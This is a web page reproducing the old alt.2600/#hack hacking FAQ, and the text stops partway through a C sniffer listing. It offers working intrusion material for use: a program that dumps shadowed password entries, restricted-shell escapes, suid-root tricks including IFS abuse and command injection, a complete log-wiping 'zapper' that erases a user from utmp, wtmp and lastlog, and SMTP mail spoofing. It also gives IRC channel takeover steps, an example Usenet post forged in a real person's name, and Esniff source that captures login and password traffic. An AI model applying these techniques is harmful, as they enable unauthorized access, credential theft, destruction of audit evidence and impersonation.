Safe

General Hackers FAQ

Home
Rs item list
Newbies start here
Hacking Tools -over 300 listed
Forgery
Hacking Web pages
General Hackers FAQ
THE RULES OF HACKING
CONTACT ME FOR COMENTS OR QUESTIONS
Some Games

Enter subhead content here

Summary: This posting contains a list of Frequently Asked
                                    Questions (and their answers) about hacking.  It
                                    should be read by anyone who wishes to post to the
                                    alt.2600 newsgroup or use the IRC channel #hack.
                                    
                                    Editors Note: Welcome to Beta .007, licensed to amuse.
                                    
                                    This release of the #hack FAQ is now the alt.2600/#hack
                                    FAQ.  Tomes, editor of the alt.2600 FAQ, and I
                                    have merged our two FAQ's into one.  Eleet greets go out
                                    to Tomes.
                                    
                                    This release is dedicated to Eric S. Real
                                    <esr@locke.ccil.org> for not only emailing me the first
                                    real flame for the FAQ, but also including a huge
                                    advertisement for a book he is hawking.
                                    
                                    To quote our little buddy Eric "I will denounce you and
                                    your cracker pals as the pathetic scum you are.  *And*
                                    do my best to see that as many as possible of you end up
                                    in Leavenworth getting butt-fucked by reality."  Eric,
                                    this Bud's for you.
                                    
                                    Many sections are missing or incomplete.  The #hack FAQ
                                    comes with no warranties, express or implied.
                                    
                                    If you have a questions regarding any of the topics
                                    covered in the FAQ, please direct it to alt.2600 or
                                    #hack.  Please do not e-mail me with them, I'm getting
                                    swamped.
                                    
                                    If your copy of the #hack FAQ does not end with the
                                    letters EOT on a line by themselves, you do not have the
                                    entire FAQ.
                                    
                                    I promise to spell check this beast before I release
                                    version 1.0.
                                    
                                    
                                    
                                    ** BETA **
                                    
                                    Beta Revision .007
                                    
                                    alt.2600/#Hack F.A.Q.
                                    
                                    by
                                    Voyager
                                    will@gnu.ai.mit.edu
                                    
                                    Sysop of
                                    Hacker's Haven
                                    (303)343-4053
                                    
                                    With special thanks to:
                                    
                                    A-Flat, Al, Aleph1, Bluesman, C-Curve, Edison, KCrow,
                                    Major, Presence, Rogue Agent, sbin, Tomes and TheSaint.
                                    
                                    
                                    We work in the dark
                                    We do what we can
                                    We give what we have
                                    Our doubt is our passion,
                                    and our passion is our task
                                    The rest is the madness of art.
                                    
                                    -- Henry James
                                    
                                    
                                    
                                    Section A: Computers
                                    
                                    01. How do I access the password file under Unix?
                                    02. How do I crack Unix passwords?
                                    03. How do I access the password file under VMS?
                                    04. How do I crack VMS passwords?
                                    05. What is NIS/yp?
                                    06. What is password shadowing?
                                    07. How do I break out of a restricted shell?
                                    08. How do I gain root from a suid script or program?
                                    09. How do I erase my presence from the system logs?
                                    10. How do I send fakemail?
                                    11. How do I fake posts to UseNet?
                                    12. How do I hack ChanOp on IRC?
                                    13. How do I modify the IRC client to hide my real username?
                                    14. What is a trojan/worm/virus/logic bomb?
                                    15. How can I protect myself from virii and such?
                                    16. What is Cryptoxxxxxxx?
                                    17. What is PGP?
                                    18. What is Tempest?
                                    U 19. How to I change to directores with strange characters in them?
                                    20. What is ethernet sniffing?
                                    21. What is an Internet Outdial?
                                    22. What are some Internet Outdials?
                                    N 23. How do I defeat copy protection?
                                    N 24. What is this system?
                                    N 25. What are the default accounts for XXX ?
                                    N 26. What port is XXX on?
                                    
                                    
                                    Section B: Telephony
                                    
                                    U 01. What is a Red Box?
                                    U 02. How do I build a Red Box?
                                    N 03. Where can I get a 6.5536Mhz crystal?
                                    04. Which payphones will a Red Box work on?
                                    05. What is a Blue Box?
                                    06. Do Blue Boxes still work?
                                    07. What is a Black Box?
                                    08. What do all the colored boxes do?
                                    U 09. What is the ANAC number for my area?
                                    10. What is a ringback number?
                                    U 11. What is the ringback number for my area?
                                    12. What is a loop?
                                    13. What is a loop in my area?
                                    14. What is a CNA number?
                                    U 15. What is the telephone company CNA number for my area?
                                    16. What is scanning?
                                    17. Is scanning illegal?
                                    N 18. Where can I purchase a lineman's handset?
                                    N 19. What are the DTMF frequencies?
                                    
                                    
                                    Section C: Resources
                                    
                                    U 01. What are some ftp sites of interest to hackers?
                                    U 02. What are some newsgroups of interest to hackers?
                                    03. What are some telnet sites of interest to hackers?
                                    U 04. What are some gopher sites of interest to hackers?
                                    U 05. What are some World wide Web (WWW) sites of interest to hackers?
                                    06. What are some IRC channels of interest to hackers?
                                    07. What are some BBS's of interest to hackers?
                                    08. What books are available on this subject?
                                    U 09. What are some mailing lists of interest to hackers?
                                    N 10. What are some print magazines of interest to hackers?
                                    N 11. What are some organizations of interest to hackers?
                                    
                                    
                                    Section D: 2600
                                    
                                    N 01. What is alt.2600?
                                    N 02. What does "2600" mean?
                                    N 03. Are there on-line versions of 2600 available?
                                    N 04. I can't find 2600 at any bookstores.  What can I do?
                                    N 05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
                                    
                                    
                                    Section E: Miscellaneous
                                    
                                    U 01. What does XXX stand for?
                                    N 02. How do I determine if I have a valid credit card number?
                                    U 03. Where can I get a copy of the #hack FAQ?
                                    
                                    
                                    
                                    U == Updated since last release of the #hack FAQ
                                    N == New since last release of the #hack FAQ
                                    
                                    
                                    
                                    
                                    Section A: Computers
                                    ~~~~~~~~~~~~~~~~~~~~
                                    
                                    01. How do I access the password file under Unix?
                                    
                                    In standard Unix the password file is /etc/passwd.  On a Unix system
                                    with either NIS/yp or password shadowing, much of the password data
                                    may be elsewhere.
                                    
                                    
                                    02. How do I crack Unix passwords?
                                    
                                    Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
                                    passwords are encrypted with a one way function.  The login program
                                    encrypts the text you enter at the "password:" prompt and compares
                                    that encrypted string against the encrypted form of your password.
                                    
                                    Password cracking software uses wordlists.  Each word in the wordlist
                                    is encrypted with each of the 4096 possible salt values and the
                                    results are compared to the encrypted form of the target password.
                                    
                                    The best cracking program for Unix passwords is currently Crack by
                                    Alec Muffett.  For PC-DOS, the best package to use is currently
                                    CrackerJack.
                                    
                                    
                                    03. How do I access the password file under VMS?
                                    
                                    Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
                                    unlike Unix, most users do not have access to read the password file.
                                    
                                    
                                    04. How do I crack VMS passwords?
                                    
                                    Write a program that uses the SYS$GETUAF functions to compare the
                                    results of encrypted words against the encrypted data in SYSUAF.DAT.
                                    
                                    Two such programs are known to exist, CHECK_PASSWORD and
                                    GUESS_PASSWORD.
                                    
                                    
                                    05. What is NIS/yp?
                                    
                                    NIS (Network Information System) in the current name for what was once
                                    known as yp (Yellow Pages).  The purpose for NIS is to allow many
                                    machies on a network to share configuration information, including
                                    password data. NIS is not designed to promote system security.  If
                                    your system uses NIS you will have a very short /etc/passwd file with
                                    a line that looks like this:
                                    
                                    +::0:0:::
                                    
                                    To view the real password file use this command "ypcat passwd"
                                    
                                    
                                    06. What is password shadowing?
                                    
                                    Password shadowing is a security system where the encrypted password
                                    field of /etc/password is replaced with a special token and the
                                    encrypted password is stored in a seperate file which is not readable
                                    by normal system users.
                                    
                                    To defeat password shadowing on many (but not all) systems, write a
                                    program that uses successive calls to getpwent() to obtain the
                                    password file.
                                    
                                    Example:
                                    
                                    #include <pwd.h>
                                    main()
                                    {
                                    struct passwd *p;
                                    while(p=getpwent())
                                    printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
                                    p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
                                    }
                                    
                                    
                                    07. How do I break out of a restricted shell?
                                    
                                    On poorly implemented restricted shells you can break out of the
                                    restricted environment by running a program that features a shell
                                    function.  A good example is vi.  Run vi and use this command:
                                    
                                    :set shell=/bin/sh
                                    
                                    then shell using this command:
                                    
                                    :shell
                                    
                                    
                                    08. How do I gain root from a suid script or program?
                                    
                                    1. Change IFS.
                                    
                                    If the program calls any other programs using the system() function
                                    call, you may be able to fool it by changing IFS.  IFS is the Internal
                                    Field Seperator that the shell uses to delimit arguments.
                                    
                                    If the program contains a line that looks like this:
                                    
                                    system("/bin/date")
                                    
                                    and you change IFS to '/' the shell will them interpret the
                                    proceeding line as:
                                    
                                    bin date
                                    
                                    Now, if you have a program of your own in the path called "bin" the
                                    suid program will run your program instead of /bin/date.
                                    
                                    To change IFS, use this command:
                                    
                                    IFS='/';export IFS      # Bourne Shell
                                    setenv IFS '/'          # C Shell
                                    export IFS='/'          # Korn Shell
                                    
                                    
                                    2. link the script to -i
                                    
                                    Create a symbolic link named "-i" to the program.  Running "-i"
                                    will cause the interpreter shell (/bin/sh) to start up in interactive
                                    mode.  This only works on suid shell scripts.
                                    
                                    Example:
                                    
                                    % ln suid.sh -i
                                    % -i
                                    #
                                    
                                    
                                    3. Exploit a race condition
                                    
                                    Replace a symbolic link to the program with another program while the
                                    kernel is loading /bin/sh.
                                    
                                    Example:
                                    
                                    nice -19 suidprog ; ln -s evilprog suidroot
                                    
                                    
                                    4. Send bad input the the program.
                                    
                                    Invoke the name of the program and a seperate command on the same
                                    command line.
                                    
                                    Example:
                                    
                                    suidprog ; id
                                    
                                    
                                    09. How do I erase my presence from the system logs?
                                    
                                    Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
                                    files that can be edited by hand with vi, you must use a program
                                    specifically written for this purpose.
                                    
                                    Example:
                                    
                                    #include <sys/types.h>
                                    #include <stdio.h>
                                    #include <unistd.h>
                                    #include <sys/file.h>
                                    #include <fcntl.h>
                                    #include <utmp.h>
                                    #include <pwd.h>
                                    #include <lastlog.h>
                                    #define WTMP_NAME "/usr/adm/wtmp"
                                    #define UTMP_NAME "/etc/utmp"
                                    #define LASTLOG_NAME "/usr/adm/lastlog"
                                    
                                    int f;
                                    
                                    void kill_utmp(who)
                                    char *who;
                                    {
                                    struct utmp utmp_ent;
                                    
                                    if ((f=open(UTMP_NAME,O_RDWR))>=0) {
                                    while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
                                    if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                                    bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                                    lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                                    write (f, &utmp_ent, sizeof (utmp_ent));
                                    }
                                    close(f);
                                    }
                                    }
                                    
                                    void kill_wtmp(who)
                                    char *who;
                                    {
                                    struct utmp utmp_ent;
                                    long pos;
                                    
                                    pos = 1L;
                                    if ((f=open(WTMP_NAME,O_RDWR))>=0) {
                                    
                                    while(pos != -1L) {
                                    lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
                                    if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
                                    pos = -1L;
                                    } else {
                                    if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                                    bzero((char *)&utmp_ent,sizeof(struct utmp ));
                                    lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
                                    write (f, &utmp_ent, sizeof (utmp_ent));
                                    pos = -1L;
                                    } else pos += 1L;
                                    }
                                    }
                                    close(f);
                                    }
                                    }
                                    
                                    void kill_lastlog(who)
                                    char *who;
                                    {
                                    struct passwd *pwd;
                                    struct lastlog newll;
                                    
                                    if ((pwd=getpwnam(who))!=NULL) {
                                    
                                    if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
                                    lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
                                    bzero((char *)&newll,sizeof( newll ));
                                    write(f, (char *)&newll, sizeof( newll ));
                                    close(f);
                                    }
                                    
                                    } else printf("%s: ?\n",who);
                                    }
                                    
                                    main(argc,argv)
                                    int argc;
                                    char *argv[];
                                    {
                                    if (argc==2) {
                                    kill_lastlog(argv[1]);
                                    kill_wtmp(argv[1]);
                                    kill_utmp(argv[1]);
                                    printf("Zap2!\n");
                                    } else
                                    printf("Error.\n");
                                    }
                                    
                                    
                                    10. How do I send fakemail?
                                    
                                    Telnet to port 25 of the machine you want the mail to appear to
                                    originate from.  Enter your message as in this example:
                                    
                                    HELO bellcore.com
                                    MAIL FROM:Voyagor@bellcore.com
                                    RCPT TO:clinton@whitehouse.gov
                                    DATA
                                    
                                    Please discontinue your silly Clipper initiative.
                                    .
                                    QUIT
                                    
                                    On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
                                    line will not work.  Test by sending yourself fakemail first.
                                    
                                    
                                    11. How do I fake posts to UseNet?
                                    
                                    Use inews to post.  Give inews the following lines:
                                    
                                    From:
                                    Newsgroups:
                                    Subject:
                                    Message-ID:
                                    Date:
                                    Organization:
                                    
                                    For a moderated newsgroup, inews will also require this line:
                                    
                                    Approved:
                                    
                                    Then add your post and terminate with <Control-D>.
                                    
                                    Example:
                                    
                                    From: Eric S. Real
                                    Newsgroups: alt.hackers
                                    Subject: Pathetic bunch of wannabe losers
                                    Message-ID: <esr.123@locke.ccil.org>
                                    Date: Fri, 13 Aug 1994 12:15:03
                                    Organization: Moral Majority
                                    
                                    A pathetic bunch of wannabe losers is what most of you are, with no
                                    right to steal the honorable title of `hacker' to puff up your silly
                                    adolescent egos. Get stuffed, get lost, and go to jail.
                                    
                                    Eric S. Raymond <esr@locke.ccil.org>
                                    
                                    
                                    ^D
                                    
                                    Note that many systems will append an Originator: line to your message
                                    header, effectively revealing the account from which the message was
                                    posted.
                                    
                                    
                                    12. How do I hack ChanOp on IRC?
                                    
                                    Find a server that is split from the rest of IRC and create your own
                                    channel there using the name of the channel you want ChanOp on.  When
                                    that server reconnects to the net, you will have ChanOp on the real
                                    channel.  If you have ServerOp on a server, you can cause it to split
                                    on purpose.
                                    
                                    
                                    13. How do I modify the IRC client to hide my real username?
                                    
                                    Get the IRC client from cs.bu.edu /irc/clients.  Look at the source
                                    code files irc.c and ctcp.c.  The code you are looking for is fairly
                                    easy to spot.  Change it. Change the username code in irc.c and the
                                    ctcp information code in ctcp.c.  Compile and run your client.
                                    
                                    Here are the diffs from a sample hack of the IRC client.  Your client
                                    code will vary slighty depending on what IRC client version you are
                                    running.
                                    
                                    *** ctcp.c.old  Wed Feb 10 10:08:05 1993
                                    --- ctcp.c      Fri Feb 12 04:33:55 1993
                                    ***************
                                    *** 331,337 ****
                                    struct  passwd  *pwd;
                                    long    diff;
                                    int     uid;
                                    !       char    c;
                                    
                                    /*
                                    * sojge complained that ircII says 'idle 1 seconds'
                                    --- 331,337 ----
                                    struct  passwd  *pwd;
                                    long    diff;
                                    int     uid;
                                    !       char    c, *fing;
                                    
                                    /*
                                    * sojge complained that ircII says 'idle 1 seconds'
                                    ***************
                                    *** 348,354 ****
                                    if (uid != DAEMON_UID)
                                    {
                                    #endif /* DAEMON_UID */       
                                    !               if (pwd = getpwuid(uid))
                                    {
                                    char    *tmp;
                                    
                                    --- 348,356 ----
                                    if (uid != DAEMON_UID)
                                    {
                                    #endif /* DAEMON_UID */       
                                    !               if (fing = getenv("IRCFINGER"))
                                    !                       send_ctcp_reply(from, ctcp->name, fing, diff, c);
                                    !               else if (pwd = getpwuid(uid))
                                    {
                                    char    *tmp;
                                    
                                    *** irc.c.old   Wed Feb 10 06:33:11 1993
                                    --- irc.c       Fri Feb 12 04:02:11 1993
                                    ***************
                                    *** 510,516 ****
                                    malloc_strcpy(&my_path, "/");
                                    if (*realname == null(char))
                                    strmcpy(realname, "*Unknown*", REALNAME_LEN);
                                    !       if (*username == null(char))
                                    {
                                    if (ptr = getenv("USER"))
                                    strmcpy(username, ptr, NAME_LEN);
                                    --- 510,518 ----
                                    malloc_strcpy(&my_path, "/");
                                    if (*realname == null(char))
                                    strmcpy(realname, "*Unknown*", REALNAME_LEN);
                                    !       if (ptr = getenv("IRCUSER"))
                                    !               strmcpy(username, ptr, NAME_LEN);
                                    !       else if (*username == null(char))
                                    {
                                    if (ptr = getenv("USER"))
                                    strmcpy(username, ptr, NAME_LEN);
                                    
                                    
                                    14. What is a trojan/worm/virus/logic bomb?
                                    
                                    This FAQ answer is excerpted from: Computer Security Basics
                                    by Deborah Russell
                                    and G.T. Gengemi Sr.
                                    
                                    Trojan:     An independent program that appears to perform a useful
                                    function but that hides another unauthorized program
                                    inside it.  When an authorized user performs the apparrent
                                    function, the trojan horse performs the unauthorized
                                    function as well (often usurping the priveleges of the
                                    user).
                                    
                                    Virus:      A code fragment (not an independent program) that
                                    reproduces by attaching to another program.  It may damage
                                    data directly, or it may degrade system performance by
                                    taking over system resources which are then not available
                                    to authorized users.
                                    
                                    Worm:       An independent program that reproduces by copying itself
                                    from one system to another, usually over a network.  Like
                                    a virus, a worm may damage data directly, or it may
                                    degrade system performace by tying up system resources and
                                    even shutting down a network.
                                    
                                    Logic Bomb: A method for releasing a system attack of some kind.  It
                                    is triggered when a particular condition (e.g., a certain
                                    date or system operation) occurs.
                                    
                                    
                                    15. How can I protect myself from virii and such?
                                    
                                    Always write protect your floppy disks when you are not purposefully
                                    writing to them.
                                    
                                    Use ATTRIB to make all of your EXE and COM files read only.  This will
                                    protect you from many poorly written viruses.
                                    
                                    Scan any software that you receive with a recent copy of a good virus
                                    scanner.  The best virus scanner currently available for DOS is F-Prot
                                    by Fridrik Skulason.  The current version is FP-212C.  It is best to
                                    use more than one virus scanner.  That will decrease your chances of
                                    missing a virus.
                                    
                                    Backup regularly, and keep several generations of backups on hand.
                                    If you always backup over your last backup, you may find yourself with
                                    an infected backup tape.
                                    
                                    
                                    16. What is Cryptoxxxxxxx?
                                    
                                    This FAQ answer is excerpted from: Computer Security Basics
                                    by Deborah Russell
                                    and G.T. Gengemi Sr.
                                    
                                    A message is called either plaintext or cleartext.  The process of
                                    disguising a message in such a way as to hide its substance is called
                                    encryption.  An encrypted message is called ciphertext.  The process
                                    of turning ciphertext back into plaintext is called decryption.
                                    
                                    The art and science of keeping messages secure is called cryptography,
                                    and it is practiced by cryptographers.  Cryptanalysts are
                                    practitioners of cryptanalysis, the art and science of breaking
                                    ciphertext, i.e. seeing through the disguise.  The branch of
                                    mathematics embodying both cryptography and cryptanalysis is called
                                    cryptology, and it's practitioners are called cryptologists.
                                    
                                    
                                    17. What is PGP?
                                    
                                    This FAQ answer is excerpted from: PGP(tm) User's Guide
                                    Volume I: Essential Topics
                                    by Philip Zimmermann
                                    
                                    PGP(tm) uses public-key encryption to protect E-mail and data files.
                                    Communicate securely with people you've never met, with no secure
                                    channels needed for prior exchange of keys.  PGP is well featured and
                                    fast, with sophisticated key management, digital signatures, data
                                    compression, and good ergonomic design.
                                    
                                    Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a
                                    high security cryptographic software application for MSDOS, Unix,
                                    VAX/VMS, and other computers.  PGP allows people to exchange files or
                                    messages with privacy, authentication, and convenience.  Privacy means
                                    that only those intended to receive a message can read it.
                                    Authentication means that messages that appear to be from a particular
                                    person can only have originated from that person. Convenience means
                                    that privacy and authentication are provided without the hassles of
                                    managing keys associated with conventional cryptographic software.  No
                                    secure channels are needed to exchange keys between users, which makes
                                    PGP much easier to use.  This is because PGP is based on a powerful
                                    new technology called "public key" cryptography.
                                    
                                    PGP combines the convenience of the Rivest-Shamir-Adleman (RSA)
                                    public key cryptosystem with the speed of conventional cryptography,
                                    message digests for digital signatures, data compression before
                                    encryption, good ergonomic design, and sophisticated key management. 
                                    And PGP performs the public-key functions faster than most other
                                    software implementations.  PGP is public key cryptography for the
                                    masses.
                                    
                                    
                                    18. What is Tempest?
                                    
                                    Computers and other electonic equipment release interference to their
                                    surrounding environment.  You may observe this by placing two video
                                    monitors close together.  The pictures will behave erratically until
                                    you space them apart.
                                    
                                    Although most of the time these emissions are simply annoyances, they
                                    can sometimes be very helpful.  Suppose we wanted to see what project
                                    a target was working on.  We could sit in a van outside her office and
                                    use sensitive electonic equipment to attempt to pick up and decipher
                                    the emanations from her video monitor.
                                    
                                    Our competitor, however, could shield the emanations from her
                                    equipment or use equipment without strong emanations.
                                    
                                    Tempest is the US Government program for evaluation and endorsement
                                    of electronic equipment that is safe from eavesdropping.
                                    
                                    
                                    19. How to I change to directores with strange characters in them?
                                    
                                    These directories are often used by people trying to hide information,
                                    most often warez (commercial software).
                                    
                                    There are several things you can do to determine what these strange
                                    characters are.  One is to use the arguments to the ls command that
                                    cause ls to give you more information:
                                    
                                    From the man page for ls:
                                    
                                    -F   Causes directories to be marked with a trailing ``/'',
                                    executable files to be marked with a trailing ``*'', and
                                    symbolic links to be marked with a trailing ``@'' symbol.
                                    
                                    -q   Forces printing of non-graphic characters in filenames as the
                                    character ``?''.
                                    
                                    -b   Forces printing of non-graphic characters in the \ddd
                                    notation, in octal.
                                    
                                    Perhaps the most useful tool is to simply do an "ls -al filename" to
                                    save the directory of the remote ftp site as a file on your local
                                    machine.  Then you can do a "cat -t -v -e filename" too see exactly
                                    what those bizarre little characters are.
                                    
                                    From the man page for cat:
                                    
                                    -v  Causes non-printing characters (with the exception of tabs,
                                    newlines, and form feeds) to be displayed.  Control characters
                                    are displayed as ^X (<Ctrl>x), where X is the key pressed with
                                    the <Ctrl> key (for example, <Ctrl>m is displayed as ^M).  The
                                    <Del> character (octal 0177) is printed as ^?.  Non-ASCII
                                    characters (with the high bit set) are printed as M -x, where
                                    x is the character specified by the seven low order bits.
                                    
                                    -t  Causes tabs to be printed as ^I and form feeds as ^L.  This
                                    option is ignored if the -v option is not specified.
                                    
                                    -e  Causes a ``$'' character to be printed at the end of each line
                                    (prior to the new-line).  This option is ignored if the -v
                                    option is not set.
                                    
                                    If the directory name includes a <SPACE> or a <TAB> you will need to
                                    enclose the entire directory name in quotes.  Example:
                                    
                                    cd "..<TAB>"
                                    
                                    On an IBM-PC, you may enter these special characters by holding down
                                    the <ALT> key and entering the decimal value of the special character
                                    on your numeric keypad.  When you release the <ALT> key, the special
                                    character should appear on your screen.  An ASCII chart can be very
                                    helpful.
                                    
                                    
                                    20. What is ethernet sniffing?
                                    
                                    Ethernet sniffing is listening (with software) to the raw ethernet
                                    device for packets that interest you.  When your software sees a
                                    packet that fits certain criteria, it logs it to a file.  The most
                                    common criteria for an interesting packet is one that contains words
                                    like "login" or "password."
                                    
                                    Many enternet sniffers are available, here are a few that may be on
                                    your system now:
                                    
                                    OS              Sniffer
                                    ~~              ~~~~~~~
                                    HP/UX           nettl (monitor) & netfmt (display)
                                    SunOS           etherfind
                                    Solaris         snoop
                                    DOS             ETHLOAD
                                    LanWatch
                                    The Gobbler
                                    Netmon
                                    LanPatrol
                                    Netwatch
                                    
                                    Here is source code for an ethernet sniffer:
                                    
                                    /* Esniff.c */
                                    
                                    #include <stdio.h>
                                    #include <ctype.h>
                                    #include <string.h>
                                    
                                    #include <sys/time.h>
                                    #include <sys/file.h>
                                    #include <sys/stropts.h>
                                    #include <sys/signal.h>
                                    #include <sys/types.h>
                                    #include <sys/socket.h>
                                    #include <sys/ioctl.h>
                                    
                                    #include <net/if.h>
                                    #include <net/nit_if.h>
                                    #include <net/nit_buf.h>
                                    #include <net/if_arp.h>
                                    
                                    #include <netinet/in.h>
                                    #include <netinet/if_ether.h>
                                    #include <netinet/in_systm.h>
                                    #include <netinet/ip.h>
                                    #include <netinet/udp.h>
                                    #include <netinet/ip_var.h>
                                    #include <netinet/udp_var.h>
                                    #include <netinet/in_systm.h>
                                    #include <netinet/tcp.h>
                                    #include <netinet/ip_icmp.h>
                                    
                                    #include <netdb.h>
                                    #include <arpa/inet.h>
                                    
                                    #define ERR stderr
                                    
                                    char    *malloc();
                                    char    *device,
                                    *ProgName,
                                    *LogName;
                                    FILE    *LOG;
                                    int     debug=0;
                                    
                                    #define NIT_DEV     "/dev/nit"
                                    #define CHUNKSIZE   4096        /* device buffer size */
                                    int     if_fd = -1;
                                    int     Packet[CHUNKSIZE+32];
                                    
                                    void Pexit(err,msg)
                                    int err; char *msg;
                                    { perror(msg);
                                    exit(err); }
                                    
                                    void Zexit(err,msg)
                                    int err; char *msg;
                                    { fprintf(ERR,msg);
                                    exit(err); }
                                    
                                    #define IP          ((struct ip *)Packet)
                                    #define IP_OFFSET   (0x1FFF)
                                    #define SZETH       (sizeof(struct ether_header))
                                    #define IPLEN       (ntohs(ip->ip_len))
                                    #define IPHLEN      (ip->ip_hl)
                                    #define TCPOFF      (tcph->th_off)
                                    #define IPS         (ip->ip_src)
                                    #define IPD         (ip->ip_dst)
                                    #define TCPS        (tcph->th_sport)
                                    #define TCPD        (tcph->th_dport)
                                    #define IPeq(s,t)   ((s).s_addr == (t).s_addr)
                                    
                                    #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
                                    
                                    #define MAXBUFLEN  (128)
                                    time_t  LastTIME = 0;
                                    
                                    struct CREC {
                                    struct CREC *Next,
                                    *Last;
                                    time_t  Time;              /* start time */
                                    struct in_addr SRCip,
                                    DSTip;
                                    u_int   SRCport,           /* src/dst ports */
                                    DSTport;
                                    u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
                                    u_int   Length;            /* current data length */
                                    u_int   PKcnt;             /* # pkts */
                                    u_long  LASTseq;
                                    };
                                    
                                    struct CREC *CLroot = NULL;
                                    
                                    char *Symaddr(ip)
                                    register struct in_addr ip;
                                    { register struct hostent *he =
                                    gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
                                    
                                    return( (he)?(he->h_name):(inet_ntoa(ip)) );
                                    }
                                    
                                    char *TCPflags(flgs)
                                    register u_char flgs;
                                    { static char iobuf[8];
                                    #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
                                    
                                    SFL(0,TH_FIN, 'F');
                                    SFL(1,TH_SYN, 'S');
                                    SFL(2,TH_RST, 'R');
                                    SFL(3,TH_PUSH,'P');
                                    SFL(4,TH_ACK, 'A');
                                    SFL(5,TH_URG, 'U');
                                    iobuf[6]=0;
                                    return(iobuf);
                                    }
                                    
                                    char *SERVp(port)
                                    register u_int port;
                                    { static char buf[10];
                                    register char *p;
                                    
                                    switch(port) {
                                    case IPPORT_LOGINSERVER: p="rlogin"; break;
                                    case IPPORT_TELNET:      p="telnet"; break;
                                    case IPPORT_SMTP:        p="smtp"; break;
                                    case IPPORT_FTP:         p="ftp"; break;
                                    default: sprintf(buf,"%u",port); p=buf; break;
                                    }
                                    return(p);
                                    }
                                    
                                    char *Ptm(t)
                                    register time_t *t;
                                    { register char *p = ctime(t);
                                    p[strlen(p)-6]=0; /* strip " YYYY\n" */
                                    return(p);
                                    }
                                    
                                    char *NOWtm()
                                    { time_t tm;
                                    time(&tm);
                                    return( Ptm(&tm) );
                                    }
                                    
                                    #define MAX(a,b) (((a)>(b))?(a):(b))
                                    #define MIN(a,b) (((a)<(b))?(a):(b))
                                    
                                    /* add an item */
                                    #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
                                    register struct CREC *CLtmp = \
                                    (struct CREC *)malloc(sizeof(struct CREC)); \
                                    time( &(CLtmp->Time) ); \
                                    CLtmp->SRCip.s_addr = SIP.s_addr; \
                                    CLtmp->DSTip.s_addr = DIP.s_addr; \
                                    CLtmp->SRCport = SPORT; \
                                    CLtmp->DSTport = DPORT; \
                                    CLtmp->Length = MIN(LEN,MAXBUFLEN); \
                                    bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
                                    CLtmp->PKcnt = 1; \
                                    CLtmp->Next = CLroot; \
                                    CLtmp->Last = NULL; \
                                    CLroot = CLtmp; \
                                    }
                                    
                                    register struct CREC *GET_NODE(Sip,SP,Dip,DP)
                                    register struct in_addr Sip,Dip;
                                    register u_int SP,DP;
                                    { register struct CREC *CLr = CLroot;
                                    
                                    while(CLr != NULL) {
                                    if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
                                    IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
                                    break;
                                    CLr = CLr->Next;
                                    }
                                    return(CLr);
                                    }
                                    
                                    #define ADDDATA_NODE(CL,DATA,LEN) { \
                                    bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
                                    CL->Length += LEN; \
                                    }
                                    
                                    #define PR_DATA(dp,ln) {    \
                                    register u_char lastc=0; \
                                    while(ln-- >0) { \
                                    if(*dp < 32) {  \
                                    switch(*dp) { \
                                    case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
                                    break; \
                                    case '\r': \
                                    case '\n': fprintf(LOG,"\n     : "); \
                                    break; \
                                    default  : fprintf(LOG,"^%c", (*dp + 64)); \
                                    break; \
                                    } \
                                    } else { \
                                    if(isprint(*dp)) fputc(*dp,LOG); \
                                    else fprintf(LOG,"(%d)",*dp); \
                                    } \
                                    lastc = *dp++; \
                                    } \
                                    fflush(LOG); \
                                    }
                                    
                                    void END_NODE(CLe,d,dl,msg)
                                    register struct CREC *CLe;
                                    register u_char *d;
                                    register int dl;
                                    register char *msg;
                                    {
                                    fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
                                    fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
                                    fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
                                    fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
                                    NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
                                    fprintf(LOG," DATA: ");
                                    { register u_int i = CLe->Length;
                                    register u_char *p = CLe->Data;
                                    PR_DATA(p,i);
                                    PR_DATA(d,dl);
                                    }
                                    
                                    fprintf(LOG,"\n-- \n");
                                    fflush(LOG);
                                    
                                    if(CLe->Next != NULL)
                                    CLe->Next->Last = CLe->Last;
                                    if(CLe->Last != NULL)
                                    CLe->Last->Next = CLe->Next;
                                    else
                                    CLroot = CLe->Next;
                                    free(CLe);
                                    }
                                    
                                    /* 30 mins (x 60 seconds) */
                                    #define IDLE_TIMEOUT 1800
                                    #define IDLE_NODE() { \
                                    time_t tm; \
                                    time(&tm); \
                                    if(LastTIME<tm) { \
                                    register struct CREC *CLe,*CLt = CLroot; \
                                    LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
